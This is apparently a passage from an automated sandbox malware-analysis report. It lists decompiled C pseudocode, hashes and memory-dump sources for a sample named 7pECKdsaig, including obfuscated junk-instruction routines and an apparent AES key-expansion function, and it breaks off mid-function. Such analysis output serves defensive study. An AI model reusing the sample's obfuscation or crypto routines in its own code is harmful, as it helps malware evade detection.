                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a29f7efacfdb8ead5b56bbc585f571a81fea1ce7cae60d3e0fbedc636a59499c
                            • Instruction ID: 75226d4c2c85c4b41dc03829c94a6ad0382f021558038d6aa58071f07ae97a7f
                            • Opcode Fuzzy Hash: a29f7efacfdb8ead5b56bbc585f571a81fea1ce7cae60d3e0fbedc636a59499c
                            • Instruction Fuzzy Hash: 82717E74B0076ACBDB24CF69D49067AF7F1FB44301BA848AED99287640D776EA50CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E00A9E1F5() {
                            				intOrPtr _t23;
                            				signed int _t25;
                            				signed char _t29;
                            				signed int _t37;
                            
                            				asm("adc ah, 0x28");
                            				asm("cmpsw");
                            				asm("rol byte [0x3380a60a], 0x97");
                            				asm("cmpsb");
                            				 *0x910f3ad4 = _t23;
                            				 *0xd1548b0f = _t37 |  *0x8350e413;
                            				_t25 =  *0x910f3ad4 -  *0xee5be5f2;
                            				 *0xc39c6f0b = _t29 |  *0x256a1f80;
                            				asm("adc [0x1c67211], esi");
                            				asm("adc [0xefb44636], edx");
                            				asm("sbb ch, 0xb6");
                            				 *0x54895a09 =  *0x54895a09 << 0xf1;
                            				 *0xfe715da1 = _t37;
                            				 *0xa8ff8a09 =  *0xa8ff8a09 & _t25;
                            				 *0xad0b6db1 =  *0xad0b6db1 | _t25;
                            				asm("cmpsw");
                            				 *0xb7dd0ea8 =  *0xb7dd0ea8 << 0xbf;
                            				asm("ror dword [0x7c70863d], 0x31");
                            				if( *0x34966492 <= _t25) {
                            					asm("adc ebp, [0x8d157b77]");
                            					_push(__esi);
                            					__edi = __edi ^  *0xcd501ad8;
                            					 *0x18442bba =  *0x18442bba << 0x59;
                            					__esp = __esp +  *0x155c5acc;
                            					asm("sbb edi, [0x3fe05167]");
                            					asm("lodsb");
                            					__eax = 0x7900970f;
                            					asm("rcr byte [0x16d27ee4], 0x88");
                            					asm("rol byte [0x5c62adb6], 0x77");
                            					__ecx = __ecx & 0x4e12c111;
                            					 *0xc70f979b =  *0xc70f979b ^ __esi;
                            					 *0xa936ca1c = __ch;
                            					_push(__ecx);
                            					if(__cl <= 8) {
                            						asm("adc [0x5a66477], edi");
                            						asm("scasb");
                            						__al = __al |  *0xe1d68d0;
                            						 *0xb3a32f64 =  *0xb3a32f64 >> 0x2f;
                            						asm("ror dword [0x3fec2fa9], 0x3c");
                            						__bl = __bl + 4;
                            						__ebp = __ebp - 0x8fb5f53e;
                            						if(__ebp == 0) {
                            							 *0x6f89127b =  *0x6f89127b << 0xa5;
                            							__ecx =  *0xdd2623f8;
                            							_pop(__esi);
                            							asm("sbb edx, [0x6fb74862]");
                            							__ecx =  *0xdd2623f8 +  *0x8ef2ea39;
                            							 *0xd7317ff =  *0xd7317ff << 0xba;
                            							asm("adc [0xb2775bf6], dh");
                            							 *0x2aff924 =  *0x2aff924 >> 0x44;
                            							asm("sbb ah, 0xf9");
                            							 *0xf4982d2c =  *0xf4982d2c + __dl;
                            							__ebp = __ebp & 0x8559fc16;
                            							__edx =  *0x70deb7de;
                            							_t14 = __esp;
                            							__esp =  *0xd34ef283;
                            							 *0xd34ef283 = _t14;
                            							if( *0x4c40778a >= __cl) {
                            								asm("adc [0xe9bbb470], edi");
                            								 *0xabca968 =  *0xabca968 << 0x84;
                            								asm("stosd");
                            								if( *0xabca968 >= 0) {
                            									__ecx = __ecx -  *0xaae6ec78;
                            									 *0xd68c3020 =  *0xd68c3020 << 0xdc;
                            									 *0x77ba123a =  *0x77ba123a | __al;
                            									asm("adc dh, [0x2ea2b8c6]");
                            									_push(0xabd4969c);
                            									_push( *0x5f31eaf1);
                            									asm("adc bh, [0x731f18b0]");
                            									asm("rcl dword [0xfdc50d09], 0xb2");
                            									asm("ror byte [0xfa20af24], 0x56");
                            									 *0x660b0f8b =  *0x660b0f8b + __esi;
                            									__edi = __edi + 1;
                            									__ebp = __ebp -  *0x6747b103;
                            									if(__ebp < 0) {
                            										__esi =  *0xa744907d * 0xda8;
                            										asm("sbb [0x1a0b96b7], bl");
                            										asm("adc [0x2da0a41f], esp");
                            										asm("sbb esp, [0x89ba7f9f]");
                            										__eax = 0x7900970f &  *0x19ca1bf4;
                            										asm("rcl dword [0x27709137], 0x5b");
                            										 *0x7c027dfb =  *0x7c027dfb << 0x18;
                            										asm("adc ecx, 0x9e051d33");
                            										 *0x686865b9 =  *0x686865b9 | 0x7900970f;
                            										_push(__edi);
                            										_push(__esi);
                            										 *0xff15c826 =  *0xff15c826 >> 0x27;
                            										asm("cmpsb");
                            										_push(__esi);
                            										if(__esi == 0) {
                            											_pop(__edx);
                            											__ecx = __ecx & 0xedb5e6a1;
                            											 *0xe8ee29d8 =  *0xe8ee29d8 - __ecx;
                            											 *0xca77a518 =  *0xca77a518 >> 0xf8;
                            											L1();
                            											__edx = __edx +  *0x96dc3e8;
                            											_pop(__edx);
                            											 *0xb13e7b8a =  *0xb13e7b8a + __bh;
                            											__ecx = __ecx ^  *0xd9d875dd;
                            											asm("scasd");
                            											asm("adc ecx, [0x79144e9e]");
                            											_pop(__eax);
                            											 *0xfdfa36e0 =  *0xfdfa36e0 ^ __bh;
                            											 *0x9c1c9584 =  *0x9c1c9584 >> 0x13;
                            											asm("ror dword [0x4ba85435], 0x79");
                            											__esp = __esp |  *0x1bf39961;
                            											__eax = __eax - 0x79aa0cc7;
                            											 *0xb21913f1 = __ebx;
                            											asm("adc edi, 0x850cd18b");
                            											__ebp = __ebp - 1;
                            											 *0x6fb70bfd =  *0x6fb70bfd + 0x7900970f;
                            											 *0x41daa2a =  *0x41daa2a & __bl;
                            											__ecx =  *0xfdfb08f7;
                            											 *0xd5c5ed1 =  *0xd5c5ed1 >> 0xc1;
                            											 *0xa88d8be6 =  *0xa88d8be6 | __bh;
                            											if( *0xa88d8be6 == 0) {
                            												 *0xa406307a =  *0xa406307a & 0x7900970f;
                            												 *0x911b1de1 =  *0x911b1de1 ^ __cl;
                            												 *0x31d30cf4 =  *0x31d30cf4 ^ __edx;
                            												 *0x3bff513d =  *0x3bff513d + 0x7900970f;
                            												 *0x395625e5 =  *0x395625e5 >> 0xe7;
                            												_push(__ecx);
                            												asm("adc esi, [0x2e5d0bc4]");
                            												__ebp =  *0x2a5d8769 * 0xade1;
                            												 *0x13a89e2e =  *0x13a89e2e >> 0x8a;
                            												asm("sbb bh, [0xb2640080]");
                            												 *0x92fff0f0 =  *0x92fff0f0 - __ecx;
                            												_t21 = __edi;
                            												__edi =  *0x10e8e668;
                            												 *0x10e8e668 = _t21;
                            												asm("stosd");
                            												_push( *0x7a762ff3);
                            												_pop(__edx);
                            												__edx = __edx ^  *0xa0c11866;
                            												 *0x3bbc1e35 =  *0x3bbc1e35 << 0xbd;
                            												 *0xf8e0019 =  *0xf8e0019 << 0xd5;
                            												__dl = __dl -  *0x3af72714;
                            												__edx = __edx -  *0x6d8f8162;
                            											}
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				L1:
                            				 *0x1be1c709 =  *0x1be1c709 << 0xb3;
                            				asm("adc esi, [0x6a6f2b6e]");
                            				if( *0x1be1c709 > 0) {
                            					_t25 = _t25 &  *0x4e0d0f76;
                            				}
                            				goto L1;
                            			}








                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c87cd99203250971db0e061da22870b89c1cb5bd800525243654fdb24edf8dc
                            • Instruction ID: 9119a3f6afbfe1ca47bdc45593e06f199f9caa0142aee831afb4ae9e02630056
                            • Opcode Fuzzy Hash: 8c87cd99203250971db0e061da22870b89c1cb5bd800525243654fdb24edf8dc
                            • Instruction Fuzzy Hash: FE915133A09795CFD716CF38C94AA813BB1F7463A0B48835ED8A1935D2D338206ADB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 61%
                            			E00A9E866(signed char __eax, void* __ebx, signed char __ecx, void* __edx, signed int __esi) {
                            				signed char _t17;
                            				signed int _t18;
                            				signed char _t20;
                            				signed char _t23;
                            				signed char _t30;
                            				intOrPtr _t32;
                            				char _t38;
                            				signed int _t42;
                            				signed int _t46;
                            				signed int _t48;
                            				void* _t50;
                            				void* _t52;
                            				void* _t54;
                            
                            				_t48 = __esi;
                            				_t30 = __ecx;
                            				_t17 = __eax;
                            				 *0x16efa8e0 =  *0x16efa8e0 + __eax;
                            				 *0xb4a0470c =  *0xb4a0470c << 0x13;
                            				_t42 = 0xcc32c1de;
                            				asm("sbb esp, [0x16d24939]");
                            				_t38 = __edx -  *0x3ccdc486;
                            				_t55 = _t54 - 0x32c1ddbd;
                            				asm("sbb esp, [0x93b70016]");
                            				_t23 = __ebx - 1;
                            				if(_t23 < 0) {
                            					L1:
                            					asm("rcl byte [0x939ff7b7], 0xe0");
                            					asm("adc al, 0xb0");
                            					 *0x748f83e7 = _t17;
                            					_t55 = _t55 ^ 0xe217dc62;
                            					_t50 = _t50 - 1 +  *0xc4bbc419;
                            					asm("sbb ch, [0x759084e5]");
                            					_t48 = _t48 - 1;
                            					_t17 = _t17 +  *0x218dd63;
                            					_t38 = _t38 - 0xb0;
                            					asm("scasb");
                            				} else {
                            					__esi =  *0xaf88ac70;
                            					_pop(__edi);
                            					asm("rcr dword [0x16d24939], 0xc6");
                            					 *0x54942410 =  *0x54942410 - __bl;
                            					__cl = __cl - 0xb4;
                            					__eax = __eax +  *0x16ef45d8;
                            					__esp = __esp - 1;
                            					asm("rcl byte [0x897790e0], 0xde");
                            					__cl = __cl;
                            					 *0xd8a8c4a8 =  *0xd8a8c4a8 | __dh;
                            					__ebp = __ebp + 1;
                            					__edx = __edx ^ 0x9e3f16ef;
                            					__esp = __esp |  *0xf9e2bc0;
                            					__edi = __edi ^  *0x40ecb2a1;
                            					asm("rcr byte [0x8f16ef88], 0xb2");
                            					__ch = __ch &  *0xa8c4a800;
                            					 *0x16ef45d8 =  *0x16ef45d8 ^ __ecx;
                            					 *0x2bbc121f = 0x826380d6;
                            					 *0xb2a10f9e =  *0xb2a10f9e + __eax;
                            					asm("ror dword [0xef8840ec], 0x93");
                            					asm("sbb edx, [0x9fe24b16]");
                            					__ecx = __ecx |  *0xccf0cc31;
                            					asm("sbb eax, 0x49395fc2");
                            					 *0x33941616 =  *0x33941616 >> 0x8e;
                            					__edi = __edi +  *0xc1dec32e;
                            					asm("adc bh, 0x32");
                            					__ebp = __ebp -  *0x81e26216;
                            					asm("sbb [0xa8009a80], ch");
                            					__esi = 0x45d8a8c4;
                            					if(__edi < 0) {
                            						goto L1;
                            						do {
                            							do {
                            								do {
                            									goto L1;
                            								} while (_t38 >= 0);
                            								 *0xe77cd173 =  *0xe77cd173 - _t17;
                            								asm("lodsb");
                            								 *0xef4544a1 =  *0xef4544a1 << 0x5b;
                            								_pop( *0x2f9d1616);
                            								_t38 = _t38 +  *0xc1ddbd1c;
                            								_t55 = 0xc02c16ef;
                            								_t23 = _t23 ^  *0xe0cc32b2;
                            								_t17 = _t17 + 0xa8;
                            								_t50 = _t50 + 1;
                            								_t48 = _t48 +  *0xefca2585 |  *0xc1daa919;
                            								 *0xa8e0cc32 =  *0xa8e0cc32 ^ _t17;
                            							} while ( *0xc83916ef != 0xc02c16ef);
                            							 *0xd8a8c4a8 =  *0xd8a8c4a8 << 0xf0;
                            							_t52 = _t50 + 1;
                            							asm("adc esi, [0xc68ff209]");
                            							 *0x173a7bc8 =  *0x173a7bc8 << 0xb2;
                            							_push(0xe0cc32c1);
                            							_t18 = _t17 + 1;
                            							 *0x4052173a =  *0x4052173a >> 0x3f;
                            							_t32 = 0xef45d88d + (_t30 &  *0x3816efa8);
                            							asm("rol dword [0x50405217], 0x74");
                            							 *0xef45d88d = _t18;
                            							 *0x9cba1d16 = _t18;
                            							_t20 = _t18;
                            							asm("sbb dl, 0xb4");
                            							asm("adc edi, [0x8daddd0f]");
                            							asm("sbb esi, [0x16ef45d8]");
                            							asm("scasb");
                            							asm("rcl byte [0x3d99a1e7], 0x5d");
                            							 *0x1db40ffd = _t32;
                            							asm("adc esp, 0xe0cc3283");
                            							 *0x16efa8e0 =  *0x16efa8e0 + 0xffffffffe0cc32fb;
                            							 *0xbe17ff2f =  *0xbe17ff2f + 0xffffffffe0cc32fb;
                            							asm("adc eax, 0x2b7093ff");
                            							 *0xfa34f216 =  *0xfa34f216 + (_t42 -  *0x997775 |  *0xef45d88d);
                            							asm("adc cl, [0xb9d9b004]");
                            							 *0xc62116ef =  *0xc62116ef << 0x66;
                            							 *0x1ee67b3 =  *0x1ee67b3 | _t20;
                            							_t38 = (0xffffffffe0cc32fb ^  *0xa8e0cc32) + 0xd2;
                            							asm("sbb edx, [0x76a2f716]");
                            							asm("stosb");
                            							 *0x5f828ee2 =  *0x5f828ee2 >> 0x98;
                            							 *0x16d24939 = 0x32ee16ef;
                            							 *0x140b36b6 = _t38;
                            							asm("sbb eax, 0x32ccebb8");
                            							 *0x8ce2a816 = _t48;
                            							 *0xa8e0cc32 =  *0xa8e0cc32 << 0x7b;
                            							_t50 = _t52 + 0xffffffffd79c0127;
                            							 *0xf2ba16ef =  *0xf2ba16ef << 0x50;
                            							asm("rcr dword [0xf9af869a], 0xa2");
                            							asm("sbb esp, [0x395fc3cc]");
                            							asm("stosd");
                            							 *0x32baf2c1 = _t32 - 1 -  *0xefa8e0cc - 1 +  *0x9c420816;
                            							asm("rcr dword [0xefa8e0cc], 0x74");
                            							asm("cmpsw");
                            							asm("adc eax, 0xbed3f5bd");
                            							_t46 = _t52;
                            							_t30 = 0x16d24939;
                            							 *0xa4071c62 =  *0xa4071c62 | _t46;
                            							_t55 = (0xc02c16ef |  *0x9e8e16ef) & 0xcc32c1db;
                            							asm("sbb bl, 0xe0");
                            							_t17 =  *0xfe16efa8;
                            							 *0x9a7c73a2 = 0x16d24939;
                            							_t23 = ( *0x311087db +  *0x2b16efa8 + 0x0000008a ^  *0xcc32bfdd) -  *0x16efa8e0 &  *0x32c5f7c6 ^  *0xa8c4a800;
                            							 *0x16ef45d8 =  *0x16ef45d8 & _t46;
                            							asm("adc esp, 0x9ba0f4be");
                            							asm("rol byte [0xa899d1b4], 0x5f");
                            							_t42 =  *0x16d24939;
                            						} while ( *0x16ef45d8 != 0);
                            						 *0x2e33947a =  *0x2e33947a | _t42;
                            						return _t17;
                            					} else {
                            						 *0x52173a78 = __ebx;
                            						__eax = __eax + 1;
                            						_push(__eax);
                            						__edx = __edx -  *0xef45d88d;
                            						__al = __al | 0x00000016;
                            						return __eax;
                            					}
                            				}
                            			}

















                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 889d42441f6580e342869c725cd4174b5c8302bc4555e28ff9271fccf7e17d02
                            • Instruction ID: 3e3a1e51b7d1c51eb0d871f3ccc865b0c4546a2167deb6747ded083446969ce2
                            • Opcode Fuzzy Hash: 889d42441f6580e342869c725cd4174b5c8302bc4555e28ff9271fccf7e17d02
                            • Instruction Fuzzy Hash: 6481043294D3C1DFE712DF78E8A66853FB1EB96324709038DC9A15B2D2D7741066CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E00A82D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                            				signed int _t66;
                            				signed int* _t69;
                            				signed int* _t81;
                            				signed int _t94;
                            				signed int _t96;
                            				signed int _t106;
                            				signed int _t108;
                            				signed int* _t110;
                            				signed int _t127;
                            				signed int _t129;
                            				signed int _t133;
                            				signed int _t152;
                            				intOrPtr _t171;
                            
                            				_t81 = _a12;
                            				_t110 = _a8;
                            				asm("ror esi, 0x8");
                            				asm("rol eax, 0x8");
                            				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                            				_t66 =  &(_t110[1]);
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                            				asm("ror esi, 0x8");
                            				asm("rol ecx, 0x8");
                            				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                            				if(_a16 != 0x100) {
                            					L4:
                            					return _t66 | 0xffffffff;
                            				} else {
                            					_t171 = _a4;
                            					_t69 = 0;
                            					_a12 = 0;
                            					while(1) {
                            						_t152 =  *(_t66 + 0x18);
                            						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                            						_t127 =  *_t66 ^ _t94;
                            						 *(_t66 + 0x1c) = _t94;
                            						_t96 =  *(_t66 + 4) ^ _t127;
                            						 *(_t66 + 0x20) = _t127;
                            						_t129 =  *(_t66 + 8) ^ _t96;
                            						 *(_t66 + 0x24) = _t96;
                            						 *(_t66 + 0x28) = _t129;
                            						if(_t69 == 6) {
                            							break;
                            						}
                            						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                            						_t133 =  *(_t66 + 0x10) ^ _t106;
                            						 *(_t66 + 0x2c) = _t106;
                            						_t108 =  *(_t66 + 0x14) ^ _t133;
                            						 *(_t66 + 0x34) = _t108;
                            						_t69 =  &(_a12[0]);
                            						 *(_t66 + 0x30) = _t133;
                            						 *(_t66 + 0x38) = _t108 ^ _t152;
                            						_t66 = _t66 + 0x20;
                            						_a12 = _t69;
                            						if(_t69 < 7) {
                            							continue;
                            						} else {
                            							goto L4;
                            						}
                            						goto L6;
                            					}
                            					return 0xe;
                            				}
                            				L6:
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                            • Instruction ID: a142f8b72a8354a4515d6c4aa4955448cf657d8894a862bebf9c662ae38935e5
                            • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                            • Instruction Fuzzy Hash: 5B5170B3E54A214BD3188F09CC40631B792EFD8312B5B81BADD1A9B357CA74E9529B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E017152A5(char __ecx) {
                            				char _v20;
                            				char _v28;
                            				char _v29;
                            				void* _v32;
                            				void* _v36;
                            				void* _v37;
                            				void* _v38;
                            				void* _v40;
                            				void* _v46;
                            				void* _v64;
                            				void* __ebx;
                            				intOrPtr* _t49;
                            				signed int _t53;
                            				short _t85;
                            				signed int _t87;
                            				signed int _t88;
                            				signed int _t89;
                            				intOrPtr _t101;
                            				intOrPtr* _t102;
                            				intOrPtr* _t104;
                            				signed int _t106;
                            				void* _t108;
                            
                            				_t93 = __ecx;
                            				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                            				_push(_t88);
                            				_v29 = __ecx;
                            				_t89 = _t88 | 0xffffffff;
                            				while(1) {
                            					L0172EEF0(0x18079a0);
                            					_t104 =  *0x1808210; // 0x1451cf8
                            					if(_t104 == 0) {
                            						break;
                            					}
                            					asm("lock inc dword [esi]");
                            					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                            					E0172EB70(_t93, 0x18079a0);
                            					if( *((char*)(_t108 + 0xf)) != 0) {
                            						_t101 =  *0x7ffe02dc;
                            						__eflags =  *(_t104 + 0x14) & 0x00000001;
                            						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                            							L9:
                            							_push(0);
                            							_push(0);
                            							_push(0);
                            							_push(0);
                            							_push(0x90028);
                            							_push(_t108 + 0x20);
                            							_push(0);
                            							_push(0);
                            							_push(0);
                            							_push( *((intOrPtr*)(_t104 + 4)));
                            							_t53 = E01759890();
                            							__eflags = _t53;
                            							if(_t53 >= 0) {
                            								__eflags =  *(_t104 + 0x14) & 0x00000001;
                            								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                            									L0172EEF0(0x18079a0);
                            									 *((intOrPtr*)(_t104 + 8)) = _t101;
                            									E0172EB70(0, 0x18079a0);
                            								}
                            								goto L3;
                            							}
                            							__eflags = _t53 - 0xc0000012;
                            							if(__eflags == 0) {
                            								L12:
                            								_t13 = _t104 + 0xc; // 0x1451d05
                            								_t93 = _t13;
                            								 *((char*)(_t108 + 0x12)) = 0;
                            								__eflags = E0174F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                            								if(__eflags >= 0) {
                            									L15:
                            									_t102 = _v28;
                            									 *_t102 = 2;
                            									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                            									L0172EEF0(0x18079a0);
                            									__eflags =  *0x1808210 - _t104; // 0x1451cf8
                            									if(__eflags == 0) {
                            										__eflags =  *((char*)(_t108 + 0xe));
                            										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                            										 *0x1808210 = _t102;
                            										_t32 = _t102 + 0xc; // 0x0
                            										 *_t95 =  *_t32;
                            										_t33 = _t102 + 0x10; // 0x0
                            										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                            										_t35 = _t102 + 4; // 0xffffffff
                            										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                            										if(__eflags != 0) {
                            											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                            											E01794888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                            										}
                            										E0172EB70(_t95, 0x18079a0);
                            										asm("lock xadd [esi], eax");
                            										if(__eflags == 0) {
                            											_push( *((intOrPtr*)(_t104 + 4)));
                            											E017595D0();
                            											L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                            										}
                            										asm("lock xadd [esi], ebx");
                            										__eflags = _t89 == 1;
                            										if(_t89 == 1) {
                            											_push( *((intOrPtr*)(_t104 + 4)));
                            											E017595D0();
                            											L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                            										}
                            										_t49 = _t102;
                            										L4:
                            										return _t49;
                            									}
                            									E0172EB70(_t93, 0x18079a0);
                            									asm("lock xadd [esi], eax");
                            									if(__eflags == 0) {
                            										_push( *((intOrPtr*)(_t104 + 4)));
                            										E017595D0();
                            										L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                            										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                            									}
                            									 *_t102 = 1;
                            									asm("lock xadd [edi], eax");
                            									if(__eflags == 0) {
                            										_t28 = _t102 + 4; // 0xffffffff
                            										_push( *_t28);
                            										E017595D0();
                            										L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                            									}
                            									continue;
                            								}
                            								_t93 =  &_v20;
                            								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                            								_t85 = 6;
                            								_v20 = _t85;
                            								_t87 = E0174F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                            								__eflags = _t87;
                            								if(_t87 < 0) {
                            									goto L3;
                            								}
                            								 *((char*)(_t108 + 0xe)) = 1;
                            								goto L15;
                            							}
                            							__eflags = _t53 - 0xc000026e;
                            							if(__eflags != 0) {
                            								goto L3;
                            							}
                            							goto L12;
                            						}
                            						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                            						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                            							goto L3;
                            						} else {
                            							goto L9;
                            						}
                            					}
                            					L3:
                            					_t49 = _t104;
                            					goto L4;
                            				}
                            				_t49 = 0;
                            				goto L4;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 626f3edcca2faa7dc60aebda4a0a2df2f2d6ba837db84d37e5764ba0adbd2bdc
                            • Instruction ID: 7a31069bb76ccb712e7f8c7ce3fe92298ae7da8158eaaa6d07f14a1f8b06ae7b
                            • Opcode Fuzzy Hash: 626f3edcca2faa7dc60aebda4a0a2df2f2d6ba837db84d37e5764ba0adbd2bdc
                            • Instruction Fuzzy Hash: 5E51DCB1205342AFD722EF28C844B27FBA4FFA5714F10091EF49587695E7B4E940CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01742AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                            				signed short* _v8;
                            				signed short* _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr* _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				short _t56;
                            				signed int _t57;
                            				intOrPtr _t58;
                            				signed short* _t61;
                            				intOrPtr _t72;
                            				intOrPtr _t75;
                            				intOrPtr _t84;
                            				intOrPtr _t87;
                            				intOrPtr* _t90;
                            				signed short* _t91;
                            				signed int _t95;
                            				signed short* _t96;
                            				intOrPtr _t97;
                            				intOrPtr _t102;
                            				signed int _t108;
                            				intOrPtr _t110;
                            				signed int _t111;
                            				signed short* _t112;
                            				void* _t113;
                            				signed int _t116;
                            				signed short** _t119;
                            				short* _t120;
                            				signed int _t123;
                            				signed int _t124;
                            				void* _t125;
                            				intOrPtr _t127;
                            				signed int _t128;
                            
                            				_t90 = __ecx;
                            				_v16 = __edx;
                            				_t108 = _a4;
                            				_v28 = __ecx;
                            				_t4 = _t108 - 1; // -1
                            				if(_t4 > 0x13) {
                            					L15:
                            					_t56 = 0xc0000100;
                            					L16:
                            					return _t56;
                            				}
                            				_t57 = _t108 * 0x1c;
                            				_v32 = _t57;
                            				_t6 = _t57 + 0x1808204; // 0x0
                            				_t123 =  *_t6;
                            				_t7 = _t57 + 0x1808208; // 0x1808207
                            				_t8 = _t57 + 0x1808208; // 0x1808207
                            				_t119 = _t8;
                            				_v36 = _t123;
                            				_t110 = _t7 + _t123 * 8;
                            				_v24 = _t110;
                            				_t111 = _a4;
                            				if(_t119 >= _t110) {
                            					L12:
                            					if(_t123 != 3) {
                            						_t58 =  *0x1808450; // 0x1453c80
                            						if(_t58 == 0) {
